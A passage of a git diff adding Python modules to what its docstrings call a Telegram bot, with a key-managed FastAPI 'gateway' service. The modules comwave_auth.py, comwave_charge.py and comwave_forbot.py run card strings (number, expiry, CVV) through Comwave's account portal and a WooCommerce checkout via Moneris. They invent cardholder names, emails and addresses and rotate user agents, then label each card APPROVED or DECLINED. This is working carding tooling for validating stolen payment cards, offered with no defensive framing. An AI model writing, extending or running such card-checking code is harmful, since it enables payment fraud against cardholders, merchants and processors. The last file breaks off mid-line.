"*" or name in allowed: + result[name] = {"status": gw["status"], "type": gw["type"]} + return {"gateways": result} + + +@app.get("/api/cooldown") +async def get_cooldown(request: Request): + key_record = await get_api_key(request) + api_key = key_record["api_key"] + allowed = key_record["allowed_gateways"] + now = time.time() + + result = {} + for name, gw in GATEWAYS.items(): + if allowed != "*" and name not in allowed: + continue + last = last_request.get(api_key, {}).get(name, 0) + remaining = gw["cooldown"] - (now - last) + if remaining > 0: + result[name] = {"ready": False, "retry_after": round(remaining, 1)} + else: + result[name] = {"ready": True, "retry_after": 0} + return result + + +# ── Admin Endpoints ── + +def require_admin(request: Request): + key = request.headers.get("x-api-key", "") + if not MASTER_KEY or key != MASTER_KEY: + raise HTTPException(401, {"detail": "Admin access denied"}) + + +@app.post("/admin/keys") +async def admin_create_key(body: CreateKeyRequest, request: Request): + require_admin(request) + result = await db.create_key( + owner=body.owner, gateways=body.gateways, request_limit=body.request_limit, + expires_days=body.expires_days, rate_per_minute=body.rate_per_minute + ) + await db.log_admin("create_key", result["api_key"], {"owner": body.owner}, get_client_ip(request)) + log.info(f"Key created for '{body.owner}': {result['api_key'][:15]}...") + return result + + +@app.get("/admin/keys") +async def admin_list_keys(request: Request): + require_admin(request) + return await db.list_keys() + + +@app.get("/admin/keys/{key}") +async def admin_get_key(key: str, request: Request): + require_admin(request) + record = await db.get_key(key) + if not record: + raise HTTPException(404, {"detail": "Key not found"}) + return record + + +@app.patch("/admin/keys/{key}") +async def admin_update_key(key: str, body: UpdateKeyRequest, request: Request): + require_admin(request) + record = await db.get_key(key) + if not record: + raise HTTPException(404, {"detail": "Key not found"}) + + updates = {} + changes = {} + if body.owner is not None: + updates["owner"] = body.owner + changes["owner"] = [record["owner"], body.owner] + if body.gateways is not None: + updates["allowed_gateways"] = body.gateways + changes["gateways"] = [record["allowed_gateways"], body.gateways] + if body.request_limit is not None: + updates["request_limit"] = body.request_limit + changes["request_limit"] = [record["request_limit"], body.request_limit] + if body.rate_per_minute is not None: + updates["rate_per_minute"] = body.rate_per_minute + changes["rate_per_minute"] = [record["rate_per_minute"], body.rate_per_minute] + if body.is_active is not None: + updates["is_active"] = body.is_active + changes["is_active"] = [record["is_active"], body.is_active] + if body.is_paused is not None: + updates["is_paused"] = body.is_paused + changes["is_paused"] = [record["is_paused"], body.is_paused] + if body.expires_days is not None: + from datetime import timedelta + new_exp = (datetime.now(timezone.utc) + timedelta(days=body.expires_days)).isoformat() + updates["expires_at"] = new_exp + changes["expires_at"] = [record["expires_at"], new_exp] + + if not updates: + raise HTTPException(400, {"detail": "No fields to update"}) + + await db.update_key(key, **updates) + action = "pause_key" if body.is_paused is True else "unpause_key" if body.is_paused is False else "update_key" + await db.log_admin(action, key, changes, get_client_ip(request)) + log.info(f"Key updated: {key[:15]}... — {list(changes.keys())}") + return {"detail": "Key updated", "changes": changes} + + +@app.delete("/admin/keys/{key}") +async def admin_delete_key(key: str, request: Request): + require_admin(request) + deleted = await db.delete_key(key) + if not deleted: + raise HTTPException(404, {"detail": "Key not found"}) + await db.log_admin("revoke_key", key, None, get_client_ip(request)) + log.info(f"Key revoked: {key[:15]}...") + return {"detail": "Key revoked"} + + +@app.get("/admin/stats") +async def admin_stats(request: Request): + require_admin(request) + stats = await db.get_stats_24h() + return { + "uptime": round(time.time() - START_TIME), + "active_tasks": sum(1 for t in tasks.values() if t["status"] in ("queued", "processing")), + "queue_depth": {name: q.qsize() for name, q in queues.items()}, + "gateway_status": {name: gw["status"] for name, gw in GATEWAYS.items()}, + **stats, + } + + +# ── Run ── + +if __name__ == "__main__": + import uvicorn + host = os.getenv("API_HOST", "0.0.0.0") + port = int(os.getenv("API_PORT", "8000")) + uvicorn.run("api:app", host=host, port=port, log_level="info") diff --git a/comwave_auth.py b/comwave_auth.py new file mode 100644 index 0000000..332f9b0 --- /dev/null +++ b/comwave_auth.py @@ -0,0 +1,309 @@ +""" +Comwave $0 Auth Gateway — Account portal card update via Moneris Checkout v1. +Single shared session, serialized ticket step, parallel Moneris processing. +""" + +import asyncio +import httpx +import random +import time +import os +import logging +from fake_useragent import UserAgent + +logger = logging.getLogger("comwave_auth") + +def get(s, start, end): + try: + start_index = s.index(start) + len(start) + end_index = s.index(end, start_index) + return s[start_index:end_index] + except ValueError: + return "" + +MONERIS_URL = "https://gateway.moneris.com/chkt/display" +IDLE_TIMEOUT = 300 +KEEPALIVE_INTERVAL = 120 +RATE_LIMIT_SECONDS = 3 + +env_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), ".env") +CW_USER = "" +CW_PASS = "" +if os.path.exists(env_path): + for line in open(env_path): + line = line.strip() + if line.startswith("COMWAVE_USERNAME="): + CW_USER = line.split("=", 1)[1] + elif line.startswith("COMWAVE_PASSWORD="): + CW_PASS = line.split("=", 1)[1] + + +class ComwaveChecker: + """ + Shared single-session Comwave checker for multi-user Telegram bot. + + - One login shared by all users. No repeated login/logout. + - _ticket_lock serializes the fast ticket step (~0.5s each). + - Moneris validate+process runs in parallel — no lock needed. + - Background tasks: idle auto-logout (5min) + keepalive ping (2min). + - Per-user rate limit prevents spam. + - Auto re-login on any session failure. + """ + + def __init__(self): + self.session: httpx.AsyncClient | None = None + self.hdrs: dict = {} + self.logged_in: bool = False + self._ticket_lock = asyncio.Lock() + self._login_lock = asyncio.Lock() + self._last_activity: float = 0 + self._user_cooldowns: dict[int | str, float] = {} + self._bg_task: asyncio.Task | None = None + self._pending: int = 0 + + def _start_bg(self): + if self._bg_task is None or self._bg_task.done(): + self._bg_task = asyncio.create_task(self._bg_loop()) + + async def _bg_loop(self): + while True: + await asyncio.sleep(30) + if not self.logged_in: + break + idle = time.time() - self._last_activity + if idle >= IDLE_TIMEOUT and self._pending == 0: + logger.info("Idle timeout — logging out") + await self._do_logout() + break + if idle >= KEEPALIVE_INTERVAL: + try: + await self.session.get( + "https://myaccount.comwave.net/viewPayment", + headers={**self.hdrs, "Accept": "text/html"}, + follow_redirects=True, + ) + except Exception: + logger.warning("Keepalive ping failed — marking session dead") + self.logged_in = False + break + + async def ensure_login(self) -> bool: + if self.logged_in and self.session: + return True + async with self._login_lock: + if self.logged_in and self.session: + return True + return await self._do_login() + + async def _do_login(self) -> bool: + if self.session: + try: + await self.session.aclose() + except Exception: + pass + self.session = httpx.AsyncClient(timeout=40) + ua_str = UserAgent().random + self.hdrs = {"User-Agent": ua_str, "Accept-Language": "en-US,en;q=0.9"} + + for attempt in range(2): + try: + r1 = await self.session.get( + "https://myaccount.comwave.net/welcome", + headers={**self.hdrs, "Accept": "text/html"}, + follow_redirects=True, + ) + ct = get(r1.text, 'name="currentTime" value="', '"') + fa = get(r1.text, 'action="', '"') + if not ct or not fa: + return False + + r2 = await self.session.post( + f"https://myaccount.comwave.net{fa}", + data={"username": CW_USER, "password": CW_PASS, "currentTime": ct}, + headers={**self.hdrs, "Content-Type": "application/x-www-form-urlencoded", + "Referer": "https://myaccount.comwave.net/welcome"}, + follow_redirects=True, + ) + + if "already logged in" in r2.text: + await self.session.get("https://myaccount.comwave.net/logoff", follow_redirects=True) + await asyncio.sleep(2) + continue + + if "Login" in (get(r2.text, "", "") or "Login"): + return False + + self.logged_in = True + self._last_activity = time.time() + self._start_bg() + logger.info("Logged in to Comwave") + return True + + except Exception as e: + logger.warning(f"Login attempt {attempt + 1} failed: {e}") + await asyncio.sleep(2) + return False + + async def _do_logout(self): + if self.session: + try: + await self.session.get("https://myaccount.comwave.net/logoff", follow_redirects=True) + except Exception: + pass + try: + await self.session.aclose() + except Exception: + pass + self.session = None + self.logged_in = False + logger.info("Logged out of Comwave") + + async def _get_ticket(self) -> tuple[str, str]: + r = await self.session.post( + "https://myaccount.comwave.net/toUpdatePayment", + data={"formBean.updateCreditCardButton": "updateCC"}, + headers={**self.hdrs, "Content-Type": "application/x-www-form-urlencoded", + "Referer": "https://myaccount.comwave.net/viewPayment"}, + follow_redirects=True, + ) + ticket = get(r.text, "monerisCheckoutTicketID = '", "'") + redirect_url = str(r.url) + return ticket, redirect_url + + async def _moneris_process(self, cc, mm, yyyy, cvv, ticket, redirect_url) -> str: + first_names = ["James", "John", "Robert", "Michael", "William", "David"] + last_names = ["Smith", "Johnson", "Williams", "Brown", "Jones", "Garcia"] + first_name = random.choice(first_names) + last_name = random.choice(last_names) + expiry = f"{mm}{yyyy[2:]}" + ua_str = self.hdrs["User-Agent"] + + mon = httpx.AsyncClient(timeout=30, follow_redirects=True) + try: + await mon.get(f"{MONERIS_URL}/index.php?tck={ticket}", + headers={"User-Agent": ua_str, "Accept": "text/html"}) + + mon_hdrs = { + "User-Agent": ua_str, + "Content-Type": "application/x-www-form-urlencoded", + "X-Requested-With": "XMLHttpRequest", + "Referer": f"{MONERIS_URL}/index.php?tck={ticket}", + } + form_data = { + "ticket": ticket, "action": "validate_transaction", + "pan": cc, "expiry_date": expiry, "cvv": cvv, + "cardholder": f"{first_name} {last_name}", + "card_data_key": "new", "currency_code": "CAD", + "wallet_details": "{}", "gift_details": "{}", + } + + rv = await mon.post(f"{MONERIS_URL}/request.php", data=form_data, headers=mon_hdrs) + if rv.json().get("response", {}).get("success") != "true": + return "Error: validate failed" + + form_data["action"] = "process_transaction" + rp = await mon.post(f"{MONERIS_URL}/request.php", data=form_data, headers=mon_hdrs) + resp = rp.json().get("response", {}) + + if resp.get("success") != "true": + return "Error: process failed" + + result = resp.get("result", "") + card_type = "" + last4 = "" + approval_code = "" + ref_no = "" + payments = resp.get("payment", []) + if payments: + p = payments[0] + card_type = p.get("card", "") + last4 = p.get("pan", "") + approval_code = p.get("approval_code", "") + ref_no = p.get("reference_no", "") + + info = f"[{card_type}] | Last4: {last4} | Auth: {approval_code} | Ref: {ref_no}" + + if result == "a": + if "monerischeckout" in redirect_url: + base = redirect_url.split("?")[0] + await self.session.post(base, data={"ticketID": ticket}, headers={ + **self.hdrs, "Content-Type": "application/x-www-form-urlencoded", + "Accept": "application/json", + }) + return f"APPROVED {info}" + else: + return f"DECLINED {info}" + finally: + await mon.aclose() + + def check_rate_limit(self, user_id: int | str) -> float: + now = time.time() + last = self._user_cooldowns.get(user_id, 0) + remaining = RATE_LIMIT_SECONDS - (now - last) + return max(0, remaining) + + def _touch_rate(self, user_id: int | str): + self._user_cooldowns[user_id] = time.time() + + async def check_card(self, full: str, user_id: int | str = 0) -> str: + start = time.time() + wait = self.check_rate_limit(user_id) + if wait > 0: + return f"Rate limited — wait {round(wait, 1)}s" + self._touch_rate(user_id) + + try: + cc, mm, yyyy, cvv = full.strip().split("|") + if len(yyyy) == 2: + yyyy = f"20{yyyy}" + except ValueError: + return "Error: bad format (cc|mm|yyyy|cvv)" + + self._pending += 1 + try: + if not await self.ensure_login(): + self.logged_in = False + if not await self.ensure_login(): + return "Error: login failed" + self._last_activity = time.time() + + async with self._ticket_lock: + try: + ticket, redirect_url = await self._get_ticket() + except Exception: + ticket, redirect_url = "", "" + + if not ticket: + self.logged_in = False + if not await self.ensure_login(): + return "Error: re-login failed" + async with self._ticket_lock: + try: + ticket, redirect_url = await self._get_ticket() + except Exception: + ticket, redirect_url = "", "" + if not ticket: + return "Error: no ticket" + + result = await self._moneris_process(cc, mm, yyyy, cvv, ticket, redirect_url) + elapsed = round(time.time() - start, 2) + return f"{result} - Taken {elapsed}s" + except Exception as e: + return f"Error: {e}" + finally: + self._pending -= 1 + + @property + def status(self) -> str: + if self.logged_in: + idle = round(time.time() - self._last_activity) if self._last_activity else 0 + return f"🟢 Session active | {self._pending} pending | idle {idle}s" + return "🔴 Session inactive" + + async def shutdown(self): + if self._bg_task and not self._bg_task.done(): + self._bg_task.cancel() + await self._do_logout() + + +checker = ComwaveChecker() diff --git a/comwave_charge.py b/comwave_charge.py new file mode 100644 index 0000000..a399254 --- /dev/null +++ b/comwave_charge.py @@ -0,0 +1,185 @@ +""" +Comwave $3.33 Charge Gateway — WooCommerce guest checkout via Moneris Checkout v1. +Stateless — each call is a fresh session. No login required. +""" + +import asyncio +import httpx +import random +import time +import logging +from fake_useragent import UserAgent + +logger = logging.getLogger("comwave_charge") + +def get(s, start, end): + try: + start_index = s.index(start) + len(start) + end_index = s.index(end, start_index) + return s[start_index:end_index] + except ValueError: + return "" + +MONERIS_URL = "https://gateway.moneris.com/chkt/display" +SHOP_URL = "https://www.comwave.net/residential" +PRODUCT_ID = 7422 +RATE_LIMIT_SECONDS = 3 + +_wc_rate: dict[int | str, float] = {} + + +async def check_card_3(full: str, user_id: int | str = 0) -> str: + """ + WooCommerce guest checkout — charges $3.33. + Returns a result string: "APPROVED ...", "DECLINED ...", or "Error: ...". + """ + start = time.time() + + now = time.time() + last = _wc_rate.get(user_id, 0) + wait = RATE_LIMIT_SECONDS - (now - last) + if wait > 0: + return f"Rate limited — wait {round(wait, 1)}s" + _wc_rate[user_id] = now + + try: + cc, mm, yyyy, cvv = full.strip().split("|") + if len(yyyy) == 2: + yyyy = f"20{yyyy}" + except ValueError: + return "Error: bad format (cc|mm|yyyy|cvv)" + + first_names = ["James", "John", "Robert", "Michael", "William", "David", "Richard", "Joseph"] + last_names = ["Smith", "Johnson", "Williams", "Brown", "Jones", "Garcia", "Miller", "Davis"] + first_name = random.choice(first_names) + last_name = random.choice(last_names) + email = f"cristini{random.randint(1000, 99999)}@gmail.com" + expiry = f"{mm}{yyyy[2:]}" + + ua = UserAgent() + ua_str = ua.random + hdrs = {"User-Agent": ua_str, "Accept-Language": "en-US,en;q=0.9"} + + async with httpx.AsyncClient(timeout=40, follow_redirects=True) as client: + try: + await client.get(SHOP_URL, headers={**hdrs, "Accept": "text/html"}) + nonce_r = await client.get( + f"{SHOP_URL}/?wc-ajax=get_refreshed_fragments", + headers={**hdrs, "Accept": "application/json"}, + ) + woo_nonce = "" + parts = nonce_r.text.split("wc_cart_fragments_params") + if len(parts) > 1: + woo_nonce = get(parts[1], '"nonce":"', '"') + + await client.post( + f"{SHOP_URL}/?wc-ajax=add_to_cart", + data={"product_id": PRODUCT_ID, "quantity": 1}, + headers={**hdrs, "Content-Type": "application/x-www-form-urlencoded", + "X-Requested-With": "XMLHttpRequest"}, + ) + + co = await client.get( + f"{SHOP_URL}/checkout/", + headers={**hdrs, "Accept": "text/html"}, + ) + co_nonce = get(co.text, 'name="woocommerce-process-checkout-nonce" value="', '"') + if not co_nonce: + co_nonce = get(co.text, '#woocommerce-process-checkout-nonce"', '"') + + checkout_data = { + "billing_first_name": first_name, + "billing_last_name": last_name, + "billing_address_1": f"{random.randint(100, 999)} Main St", + "billing_address_2": "", + "billing_city": "Toronto", + "billing_state": "ON", + "billing_postcode": "M5V 2T6", + "billing_country": "CA", + "billing_phone": f"416{random.randint(1000000, 9999999)}", + "billing_email": email, + "shipping_method[0]": "flat_rate:1", + "payment_method": "moneris_checkout", + "woocommerce-process-checkout-nonce": co_nonce, + "_wp_http_referer": "/residential/checkout/", + "terms": "on", + "terms-field": "1", + } + + cr = await client.post( + f"{SHOP_URL}/?wc-ajax=checkout", + data=checkout_data, + headers={**hdrs, "Content-Type": "application/x-www-form-urlencoded", + "X-Requested-With": "XMLHttpRequest"}, + ) + cr_json = cr.json() + ticket = cr_json.get("ticket", "") + if not ticket: + msgs = cr_json.get("messages", "") + if msgs: + err = get(str(msgs), "
  • ", "
  • ") or str(msgs)[:120] + return f"Error: {err}" + return f"Error: no ticket from WooCommerce" + + mon = httpx.AsyncClient(timeout=30, follow_redirects=True) + try: + await mon.get( + f"{MONERIS_URL}/index.php?tck={ticket}", + headers={"User-Agent": ua_str, "Accept": "text/html"}, + ) + + form_data = { + "ticket": ticket, + "action": "validate_transaction", + "pan": cc, + "expiry_date": expiry, + "cvv": cvv, + "cardholder": f"{first_name} {last_name}", + "card_data_key": "new", + "currency_code": "CAD", + "wallet_details": "{}", + "gift_details": "{}", + } + mon_hdrs = { + "User-Agent": ua_str, + "Content-Type": "application/x-www-form-urlencoded", + "X-Requested-With": "XMLHttpRequest", + "Referer": f"{MONERIS_URL}/index.php?tck={ticket}", + } + + rv = await mon.post(f"{MONERIS_URL}/request.php", data=form_data, headers=mon_hdrs) + if rv.json().get("response", {}).get("success") != "true": + return "Error: validate failed" + + form_data["action"] = "process_transaction" + rp = await mon.post(f"{MONERIS_URL}/request.php", data=form_data, headers=mon_hdrs) + resp = rp.json().get("response", {}) + + if resp.get("success") != "true": + return "Error: process failed" + + result = resp.get("result", "") + card_type = "" + last4 = "" + approval_code = "" + ref_no = "" + payments = resp.get("payment", []) + if payments: + p = payments[0] + card_type = p.get("card", "") + last4 = p.get("pan", "") + approval_code = p.get("approval_code", "") + ref_no = p.get("reference_no", "") + + info = f"[{card_type}] | Last4: {last4} | Auth: {approval_code} | Ref: {ref_no}" + elapsed = round(time.time() - start, 2) + + if result == "a": + return f"APPROVED {info} - Taken {elapsed}s" + else: + return f"DECLINED {info} - Taken {elapsed}s" + finally: + await mon.aclose() + + except Exception as e: + return f"Error: {e}" diff --git a/comwave_forbot.py b/comwave_forbot.py new file mode 100644 index 0000000..b0626f8 --- /dev/null +++ b/comwave_forbot.py @@ -0,0 +1,514 @@ +import asyncio +import httpx +import random +import time +import os +import logging +from fake_useragent import UserAgent + +logger = logging.getLogger("comwave") + +def get(s, start, end): + try: + start_index = s.index(start) + len(start) + end_index = s.index(end, start_index) + return s[start_index:end_index] + except ValueError: + return "" + +MONERIS_URL = "https://gateway.moneris.com/chkt/display" +IDLE_TIMEOUT = 300 # 5 min — auto-logout after no activity +KEEPALIVE_INTERVAL = 120 # 2 min — ping session to prevent server-side expiry +RATE_LIMIT_SECONDS = 3 # per-user cooldown between requests + +env_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), ".env") +CW_USER = "" +CW_PASS = "" +if os.path.exists(env_path): + for line in open(env_path): + line = line.strip() + if line.startswith("COMWAVE_USERNAME="): + CW_USER = line.split("=", 1)[1] + elif line.startswith("COMWAVE_PASSWORD="): + CW_PASS = line.split("=", 1)[1] + + +class ComwaveChecker: + """ + Shared single-session Comwave checker for multi-user Telegram bot. + + - One login shared by all users. No repeated login/logout. + - _ticket_lock serializes the fast ticket step (~0.5s each). + - Moneris validate+process runs in parallel — no lock needed. + - Background tasks: idle auto-logout (5min) + keepalive ping (2min). + - Per-user rate limit prevents spam. + - Auto re-login on any session failure. + """ + + def __init__(self): + self.session: httpx.AsyncClient | None = None + self.hdrs: dict = {} + self.logged_in: bool = False + self._ticket_lock = asyncio.Lock() + self._login_lock = asyncio.Lock() + self._last_activity: float = 0 + self._user_cooldowns: dict[int | str, float] = {} + self._bg_task: asyncio.Task | None = None + self._pending: int = 0 # how many requests are waiting/processing + + # ── Background worker: keepalive + idle logout ──────────────────────────── + + def _start_bg(self): + if self._bg_task is None or self._bg_task.done(): + self._bg_task = asyncio.create_task(self._bg_loop()) + + async def _bg_loop(self): + """Runs while session is alive. Pings keepalive, handles idle logout.""" + while True: + await asyncio.sleep(30) # check every 30s + if not self.logged_in: + break + + idle = time.time() - self._last_activity + + # Idle timeout — logout if no one has used it for 5 min + if idle >= IDLE_TIMEOUT and self._pending == 0: + logger.info("Idle timeout — logging out") + await self._do_logout() + break + + # Keepalive — ping session if idle > 2 min but < 5 min + if idle >= KEEPALIVE_INTERVAL: + try: + await self.session.get( + "https://myaccount.comwave.net/viewPayment", + headers={**self.hdrs, "Accept": "text/html"}, + follow_redirects=True, + ) + except Exception: + logger.warning("Keepalive ping failed — marking session dead") + self.logged_in = False + break + + # ── Login / logout ──────────────────────────────────────────────────────── + + async def ensure_login(self) -> bool: + if self.logged_in and self.session: + return True + + async with self._login_lock: + if self.logged_in and self.session: + return True + return await self._do_login() + + async def _do_login(self) -> bool: + if self.session: + try: + await self.session.aclose() + except Exception: + pass + + self.session = httpx.AsyncClient(timeout=40) + ua_str = UserAgent().random + self.hdrs = {"User-Agent": ua_str, "Accept-Language": "en-US,en;q=0.9"} + + for attempt in range(2): + try: + r1 = await self.session.get( + "https://myaccount.comwave.net/welcome", + headers={**self.hdrs, "Accept": "text/html"}, + follow_redirects=True, + ) + ct = get(r1.text, 'name="currentTime" value="', '"') + fa = get(r1.text, 'action="', '"') + if not ct or not fa: + return False + + r2 = await self.session.post( + f"https://myaccount.comwave.net{fa}", + data={"username": CW_USER, "password": CW_PASS, "currentTime": ct}, + headers={**self.hdrs, "Content-Type": "application/x-www-form-urlencoded", + "Referer": "https://myaccount.comwave.net/welcome"}, + follow_redirects=True, + ) + + if "already logged in" in r2.text: + await self.session.get("https://myaccount.comwave.net/logoff", follow_redirects=True) + await asyncio.sleep(2) + continue # retry + + if "Login" in (get(r2.text, "", "") or "Login"): + return False + + self.logged_in = True + self._last_activity = time.time() + self._start_bg() + logger.info("Logged in to Comwave") + return True + + except Exception as e: + logger.warning(f"Login attempt {attempt + 1} failed: {e}") + await asyncio.sleep(2) + + return False + + async def _do_logout(self): + if self.session: + try: + await self.session.get("https://myaccount.comwave.net/logoff", follow_redirects=True) + except Exception: + pass + try: + await self.session.aclose() + except Exception: + pass + self.session = None + self.logged_in = False + logger.info("Logged out of Comwave") + + # ── Ticket generation (sequential via lock) ─────────────────────────────── + + async def _get_ticket(self) -> tuple[str, str]: + r = await self.session.post( + "https://myaccount.comwave.net/toUpdatePayment", + data={"formBean.updateCreditCardButton": "updateCC"}, + headers={**self.hdrs, "Content-Type": "application/x-www-form-urlencoded", + "Referer": "https://myaccount.comwave.net/viewPayment"}, + follow_redirects=True, + ) + ticket = get(r.text, "monerisCheckoutTicketID = '", "'") + redirect_url = str(r.url) + return ticket, redirect_url + + # ── Moneris validate + process (parallel-safe) ─────────────────────────── + + async def _moneris_process(self, cc, mm, yyyy, cvv, ticket, redirect_url) -> str: + first_names = ["James", "John", "Robert", "Michael", "William", "David"] + last_names = ["Smith", "Johnson", "Williams", "Brown", "Jones", "Garcia"] + first_name = random.choice(first_names) + last_name = random.choice(last_names) + expiry = f"{mm}{yyyy[2:]}" + ua_str = self.hdrs["User-Agent"] + + mon = httpx.AsyncClient(timeout=30, follow_redirects=True) + try: + await mon.get(f"{MONERIS_URL}/index.php?tck={ticket}", + headers={"User-Agent": ua_str, "Accept": "text/html"}) + + mon_hdrs = { + "User-Agent": ua_str, + "Content-Type": "application/x-www-form-urlencoded", + "X-Requested-With": "XMLHttpRequest", + "Referer": f"{MONERIS_URL}/index.php?tck={ticket}", + } + form_data = { + "ticket": ticket, "action": "validate_transaction", + "pan": cc, "expiry_date": expiry, "cvv": cvv, + "cardholder": f"{first_name} {last_name}", + "card_data_key": "new", "currency_code": "CAD", + "wallet_details": "{}", "gift_details": "{}", + } + + rv = await mon.post(f"{MONERIS_URL}/request.php", data=form_data, headers=mon_hdrs) + if rv.json().get("response", {}).get("success") != "true": + return "Error: validate failed" + + form_data["action"] = "process_transaction" + rp = await mon.post(f"{MONERIS_URL}/request.php", data=form_data, headers=mon_hdrs) + resp = rp.json().get("response", {}) + + if resp.get("success") != "true": + return "Error: process failed" + + result = resp.get("result", "") + card_type = "" + amount = "" + last4 = "" + approval_code = "" + ref_no = "" + payments = resp.get("payment", []) + if payments: + p = payments[0] + card_type = p.get("card", "") + amount = p.get("amount", "") + last4 = p.get("pan", "") + approval_code = p.get("approval_code", "") + ref_no = p.get("reference_no", "") + + info = f"[{card_type}] | Last4: {last4} | Auth: {approval_code} | Ref: {ref_no}" + + if result == "a": + if "monerischeckout" in redirect_url: + base = redirect_url.split("?")[0] + await self.session.post(base, data={"ticketID": ticket}, headers={ + **self.hdrs, "Content-Type": "application/x-www-form-urlencoded", + "Accept": "application/json", + }) + return f"APPROVED {info}" + else: + return f"DECLINED {info}" + finally: + await mon.aclose() + + # ── Rate limiting ───────────────────────────────────────────────────────── + + def check_rate_limit(self, user_id: int | str) -> float: + """Returns 0 if allowed, or seconds remaining until next allowed request.""" + now = time.time() + last = self._user_cooldowns.get(user_id, 0) + remaining = RATE_LIMIT_SECONDS - (now - last) + return max(0, remaining) + + def _touch_rate(self, user_id: int | str): + self._user_cooldowns[user_id] = time.time() + + # ── Main entry point ────────────────────────────────────────────────────── + + async def check_card(self, full: str, user_id: int | str = 0) -> str: + """ + Check a single card. Safe to call concurrently from multiple bot handlers. + Returns result string like "APPROVED [VISA] - Taken 5.41s" + """ + start = time.time() + + # Rate limit + wait = self.check_rate_limit(user_id) + if wait > 0: + return f"Rate limited — wait {round(wait, 1)}s" + self._touch_rate(user_id) + + # Parse card + try: + cc, mm, yyyy, cvv = full.strip().split("|") + if len(yyyy) == 2: + yyyy = f"20{yyyy}" + except ValueError: + return "Error: bad format (cc|mm|yyyy|cvv)" + + self._pending += 1 + try: + # Ensure logged in + if not await self.ensure_login(): + self.logged_in = False + if not await self.ensure_login(): + return "Error: login failed" + + self._last_activity = time.time() + + # Get ticket (serialized) + async with self._ticket_lock: + try: + ticket, redirect_url = await self._get_ticket() + except Exception: + ticket, redirect_url = "", "" + + # Retry once on failed ticket (session may be dead) + if not ticket: + self.logged_in = False + if not await self.ensure_login(): + return "Error: re-login failed" + async with self._ticket_lock: + try: + ticket, redirect_url = await self._get_ticket() + except Exception: + ticket, redirect_url = "", "" + if not ticket: + return "Error: no ticket" + + # Process via Moneris (parallel, no lock) + result = await self._moneris_process(cc, mm, yyyy, cvv, ticket, redirect_url) + elapsed = round(time.time() - start, 2) + return f"{result} - Taken {elapsed}s" + + except Exception as e: + return f"Error: {e}" + finally: + self._pending -= 1 + + @property + def status(self) -> str: + if self.logged_in: + idle = round(time.time() - self._last_activity) if self._last_activity else 0 + return f"🟢 Session active | {self._pending} pending | idle {idle}s" + return "🔴 Session inactive" + + async def shutdown(self): + if self._bg_task and not self._bg_task.done(): + self._bg_task.cancel() + await self._do_logout() + + +# ── WooCommerce $3 charge checker (stateless, no login needed) ──────────────── + +SHOP_URL = "https://www.comwave.net/residential" +PRODUCT_ID = "7422" # One Time Activation — $2.95 CAD + +_wc_rate: dict[int | str, float] = {} + + +async def check_card_3(full: str, user_id: int | str = 0) -> str: + """ + WooCommerce guest checkout — charges $3.33 CAD ($2.95 + tax). + Stateless: each call gets its own session. Fully parallel-safe. + """ + start = time.time() + + # Rate limit + now = time.time() + last = _wc_rate.get(user_id, 0) + if RATE_LIMIT_SECONDS - (now - last) > 0: + return f"Rate limited — wait {round(RATE_LIMIT_SECONDS - (now - last), 1)}s" + _wc_rate[user_id] = now + + try: + cc, mm, yyyy, cvv = full.strip().split("|") + if len(yyyy) == 2: + yyyy = f"20{yyyy}" + except ValueError: + return "Error: bad format (cc|mm|yyyy|cvv)" + + first_names = ["James", "John", "Robert", "Michael", "William", "David"] + last_names = ["Smith", "Johnson", "Williams", "Brown", "Jones", "Garcia"] + first_name = random.choice(first_names) + last_name = random.choice(last_names) + mail = f"cristini{random.randint(1000, 99999)}@gmail.com" + + ua_str = UserAgent().random + base_headers = {"User-Agent": ua_str, "Accept-Language": "en-US,en;q=0.9"} + + session = httpx.AsyncClient(timeout=40, follow_redirects=True) + try: + # Start WC session + await session.get(f"{SHOP_URL}/shop/", headers={**base_headers, "Accept": "text/html"}) + + # Add to cart + await session.post( + f"{SHOP_URL}/?wc-ajax=add_to_cart", + data={"product_id": PRODUCT_ID, "quantity": "1"}, + headers={**base_headers, "Accept": "application/json", "X-Requested-With": "XMLHttpRequest"}, + ) + + # Get checkout nonce + r3 = await session.get(f"{SHOP_URL}/checkout/", headers={**base_headers, "Accept": "text/html"}) + nonce = get(r3.text, '"update_order_review_nonce":"', '"') + if not nonce: + return "Error: no nonce" + + # Update order review + await session.post( + f"{SHOP_URL}/?wc-ajax=update_order_review", + data={ + "security": nonce, + "payment_method": "moneris_checkout_woocommerce", + "country": "CA", "state": "ON", "postcode": "M5H2N2", + "city": "Toronto", "address": "123 Main Street", + "has_full_address": "true", + }, + headers={**base_headers, "X-Requested-With": "XMLHttpRequest"}, + ) + + # Get Moneris ticket + r5 = await session.post( + f"{SHOP_URL}/moneris-checkout-wc?type=getticket", + data={ + "billing_first_name": first_name, "billing_last_name": last_name, + "billing_country": "CA", "billing_address_1": "123 Main Street", + "billing_state": "ON", "billing_city": "Toronto", + "billing_postcode": "M5H2N2", "billing_phone": "4165551234", + "billing_email": mail, + "payment_method": "moneris_checkout_woocommerce", + }, + headers={**base_headers, "X-Requested-With": "XMLHttpRequest"}, + ) + try: + ticket = r5.json()["data"]["ticket"] + except Exception: + return f"Error: no ticket" + + # Moneris validate + process + expiry = f"{mm}{yyyy[2:]}" + mon = httpx.AsyncClient(timeout=30, follow_redirects=True) + try: + await mon.get(f"{MONERIS_URL}/index.php?tck={ticket}", + headers={"User-Agent": ua_str, "Accept": "text/html"}) + + mon_hdrs = { + "User-Agent": ua_str, + "Content-Type": "application/x-www-form-urlencoded", + "X-Requested-With": "XMLHttpRequest", + "Referer": f"{MONERIS_URL}/index.php?tck={ticket}", + } + form_data = { + "ticket": ticket, "action": "validate_transaction", + "pan": cc, "expiry_date": expiry, "cvv": cvv, + "cardholder": f"{first_name} {last_name}", + "card_data_key": "new", "currency_code": "CAD", + "wallet_details": "{}", "gift_details": "{}", + } + + rv = await mon.post(f"{MONERIS_URL}/request.php", data=form_data, headers=mon_hdrs) + if rv.json().get("response", {}).get("success") != "true": + return "Error: validate failed" + + form_data["action"] = "process_transaction" + rp = await mon.post(f"{MONERIS_URL}/request.php", data=form_data, headers=mon_hdrs) + resp = rp.json().get("response", {}) + + if resp.get("success") != "true": + return "Error: process failed" + + result = resp.get("result", "") + card_type = "" + amount = "" + last4 = "" + approval_code = "" + ref_no = "" + payments = resp.get("payment", []) + if payments: + p = payments[0] + card_type = p.get("card", "") + amount = p.get("amount", "") + last4 = p.get("pan", "") + approval_code = p.get("approval_code", "") + ref_no = p.get("reference_no", "") + + info = f"[{card_type}] | Amount: {amount} | Last4: {last4} | Auth: {approval_code} | 